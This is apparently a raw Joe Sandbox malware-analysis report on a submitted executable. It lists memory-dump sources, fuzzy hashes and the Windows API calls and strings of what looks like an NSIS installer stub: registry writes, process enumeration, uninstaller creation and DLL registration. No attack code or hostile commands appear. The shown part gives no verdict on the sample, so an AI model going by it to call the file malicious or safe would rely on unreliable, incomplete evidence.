                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CreateInstance
                                                                                                                                                                                                                                                                                    • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                                                                                                                                                                    • API String ID: 542301482-1377821865
                                                                                                                                                                                                                                                                                    • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                                                                                                                                    • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                                                                                                                                    • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                                                                                                                                    • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                                                                                                                                                                                                                    • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                                                                                                                                                                                                                      • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
Similarity
• API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
• String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
• API String ID: 20674999-2124804629
• Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
• Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
• Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
• Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
APIs
• CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
• GetDlgItem.USER32(?,000003E8), ref: 004041AD
• SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
• GetSysColor.USER32(?), ref: 004041DB
• SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
• SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
• lstrlenW.KERNEL32(?), ref: 00404202
• SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
• SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
  • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
  • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
  • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
• GetDlgItem.USER32(?,0000040A), ref: 00404276
• SendMessageW.USER32(00000000), ref: 0040427D
• GetDlgItem.USER32(?,000003E8), ref: 004042AA
• SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
• LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
• SetCursor.USER32(00000000), ref: 004042FE
• ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
• LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
• SetCursor.USER32(00000000), ref: 00404322
• SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
• SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
Strings
Memory Dump Source
• Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
Similarity
• API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
• String ID: F$N$open
• API String ID: 3928313111-1104729357
• Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
• Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
• Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
• Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
APIs
• lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
• CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
• GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
  • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
  • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
• GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
• WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
• WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
• wsprintfA.USER32 ref: 00406B79
• GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
• GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
• ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
• lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
• SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
  • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
  • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
• WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
• GlobalFree.KERNEL32(00000000), ref: 00406C7E
• CloseHandle.KERNEL32(?), ref: 00406C88
Strings
Memory Dump Source
• Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
Similarity
• API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
• String ID: ^F$%s=%s$NUL$[Rename]$plF
• API String ID: 565278875-3368763019
• Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
• Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
• Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
• Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                                                                                                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                                                                                                                                                    • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                                                                                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                                                                                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                                                                                                                                                    • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                                                                                                                                                    • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                                                                    • String ID: F
                                                                                                                                                                                                                                                                                    • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                                                                    • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                                    • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                                                                                                                                                    • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                                                                                                                                                    • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                                                                                                                                                    • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                                                                                                                                                    • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                                                                                                                                                    • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                                                                                                                                                    • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                                                                                                                                                    • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                                                                                                                                                    • API String ID: 1641139501-220328614
                                                                                                                                                                                                                                                                                    • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                                                                                                                                    • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
Similarity
• API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
• String ID: @bG$RMDir: RemoveDirectory invalid input("")
• API String ID: 3734993849-3206598305
• Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
• Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
• Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
• Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
APIs
• GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
• GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
• GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
• WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
• GlobalFree.KERNEL32(00000000), ref: 00402F17
• CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
• DeleteFileW.KERNEL32(?), ref: 00402F56
Strings
• created uninstaller: %d, "%s", xrefs: 00402F3B
Memory Dump Source
• Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
Similarity
• API ID: Global$AllocFileFree$CloseDeleteHandleWrite
• String ID: created uninstaller: %d, "%s"
• API String ID: 3294113728-3145124454
• Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
• Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
• Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
• Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
APIs
• GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424179,74DF23A0,00000000), ref: 00404FD6
  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424179,74DF23A0,00000000), ref: 00404FE6
  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424179,74DF23A0,00000000), ref: 00404FF9
  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
• LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
• FreeLibrary.KERNEL32(?,?), ref: 004024C3
Strings
• Error registering DLL: %s not found in %s, xrefs: 0040249A
• Error registering DLL: Could not load %s, xrefs: 004024DB
• `G, xrefs: 0040246E
• Error registering DLL: Could not initialize OLE, xrefs: 004024F1
Memory Dump Source
